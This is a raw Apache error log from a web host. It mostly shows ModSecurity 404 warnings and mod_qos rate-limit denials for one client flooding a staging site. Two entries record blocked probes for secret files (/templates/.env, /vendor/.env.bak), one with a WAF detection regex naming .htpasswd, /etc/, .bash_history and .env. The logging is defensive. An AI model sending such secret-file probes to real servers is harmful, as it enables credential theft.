[Tue May 26 19:53:40.281977 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqSwAAANc"]
[Tue May 26 19:53:40.282790 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqZAAAAMY"]
[Tue May 26 19:53:40.285170 2026] [security2:error] [pid 86490:tid 86729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqWQAAAPI"]
[Tue May 26 19:53:40.286504 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqYgAAAKo"]
[Tue May 26 19:53:40.287147 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqUwAAAIs"]
[Tue May 26 19:53:40.303526 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqXwAAAPA"]
[Tue May 26 19:53:40.304854 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqaQAAANg"]
[Tue May 26 19:53:40.306071 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqbAAAAO0"]
[Tue May 26 19:53:40.324776 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKIQAAABE"]
[Tue May 26 19:53:40.333101 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKIwAAABk"]
[Tue May 26 19:53:40.333351 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKJAAAAB0"]
[Tue May 26 19:53:40.334092 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqcwAAANw"]
[Tue May 26 19:53:40.430891 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/templates/.env"] [unique_id "ahWs7FZMwN0DpLVWo6KqfwAAALM"]
[Tue May 26 19:53:40.454826 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKJwAAADw"]
[Tue May 26 19:53:40.479769 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKKAAAAD8"]
[Tue May 26 19:53:40.491546 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqfQAAAJ8"]
[Tue May 26 19:53:40.494796 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKKgAAAAQ"]
[Tue May 26 19:53:40.496553 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKLgAAAFw"]
[Tue May 26 19:53:40.500589 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqeQAAANE"]
[Tue May 26 19:53:40.522906 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqgQAAANA"]
[Tue May 26 19:53:40.530215 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqhAAAAKY"]
[Tue May 26 19:53:40.567184 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqlgAAAJU"]
[Tue May 26 19:53:40.568058 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqlwAAAPY"]
[Tue May 26 19:53:40.568524 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqjAAAAPo"]
[Tue May 26 19:53:40.573066 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqjgAAAMY"]
[Tue May 26 19:53:40.576761 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKMgAAAF8"]
[Tue May 26 19:53:40.577839 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqiQAAAK8"]
[Tue May 26 19:53:40.585763 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKLwAAAFs"]
[Tue May 26 19:53:40.599582 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vendor/.env.bak"] [unique_id "ahWs7FZMwN0DpLVWo6KqxgAAALo"]
[Tue May 26 19:53:40.621779 2026] [security2:error] [pid 86490:tid 86672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqsQAAALk"]
[Tue May 26 19:53:40.631499 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqtQAAALc"]
[Tue May 26 19:53:40.632746 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KquwAAAP8"]
[Tue May 26 19:53:40.633208 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqqwAAAO4"]
[Tue May 26 19:53:40.634953 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqrAAAAKU"]
[Tue May 26 19:53:40.643554 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqsAAAANw"]
[Tue May 26 19:53:40.645883 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqxAAAAOA"]
[Tue May 26 19:53:40.645909 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqvwAAAJQ"]
[Tue May 26 19:53:40.646136 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqwgAAAJ0"]
[Tue May 26 19:53:40.651226 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqvgAAAMM"]
[Tue May 26 19:53:40.659957 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqugAAAL4"]
[Tue May 26 19:53:40.673329 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqtAAAAPc"]
[Tue May 26 19:53:40.686679 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqvAAAAK0"]
[Tue May 26 19:53:41.172872 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7WDRMqfxdEDkoszKewAAACo
[Tue May 26 19:53:41.173569 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKfAAAACo
[Tue May 26 19:53:41.175956 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKfQAAADY
[Tue May 26 19:53:41.180959 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrKAAAAIo
[Tue May 26 19:53:41.182397 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7WDRMqfxdEDkoszKfwAAAEc
[Tue May 26 19:53:41.182828 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrKQAAAK8
[Tue May 26 19:53:41.184155 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrKgAAAIY
[Tue May 26 19:53:41.186608 2026] [http2:info] [pid 93867:tid 93867] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:53:41.189443 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7WDRMqfxdEDkoszKgQAAAFA
[Tue May 26 19:53:41.189932 2026] [http2:info] [pid 93868:tid 93868] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:53:41.191171 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrLQAAAJE
[Tue May 26 19:53:41.197363 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7WDRMqfxdEDkoszKhAAAAAc
[Tue May 26 19:53:41.321373 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq1AAAAN4"]
[Tue May 26 19:53:41.331746 2026] [security2:error] [pid 86490:tid 86658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq3AAAAKs"]
[Tue May 26 19:53:41.336300 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrMwAAAIo
[Tue May 26 19:53:41.336738 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrMQAAAOU
[Tue May 26 19:53:41.337740 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrMgAAAKs
[Tue May 26 19:53:41.338730 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrNAAAAK8
[Tue May 26 19:53:41.339583 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKhwAAAC4
[Tue May 26 19:53:41.340973 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq3QAAAP4"]
[Tue May 26 19:53:41.359832 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7UqK9k_ZUB2Vp25EWAAAAZA
[Tue May 26 19:53:41.365532 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq1gAAAPs"]
[Tue May 26 19:53:41.368419 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq2AAAAJA"]
[Tue May 26 19:53:41.370007 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrBAAAAOA"]
[Tue May 26 19:53:41.371297 2026] [security2:error] [pid 86490:tid 86728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrCwAAAPE"]
[Tue May 26 19:53:41.375473 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKSgAAAFg"]
[Tue May 26 19:53:41.376008 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKSQAAAG4"]
[Tue May 26 19:53:41.378033 2026] [security2:error] [pid 86490:tid 86693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrAgAAAM4"]
[Tue May 26 19:53:41.378816 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq4AAAAJw"]
[Tue May 26 19:53:41.382102 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKRgAAAGs"]
[Tue May 26 19:53:41.382133 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq2gAAANM"]
[Tue May 26 19:53:41.393950 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKTgAAACg"]
[Tue May 26 19:53:41.397734 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq4wAAALI"]
[Tue May 26 19:53:41.401882 2026] [security2:error] [pid 93576:tid 93723] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKcgAAAAs"]
[Tue May 26 19:53:41.402779 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq0gAAAIg"]
[Tue May 26 19:53:41.403531 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq4QAAAJI"]
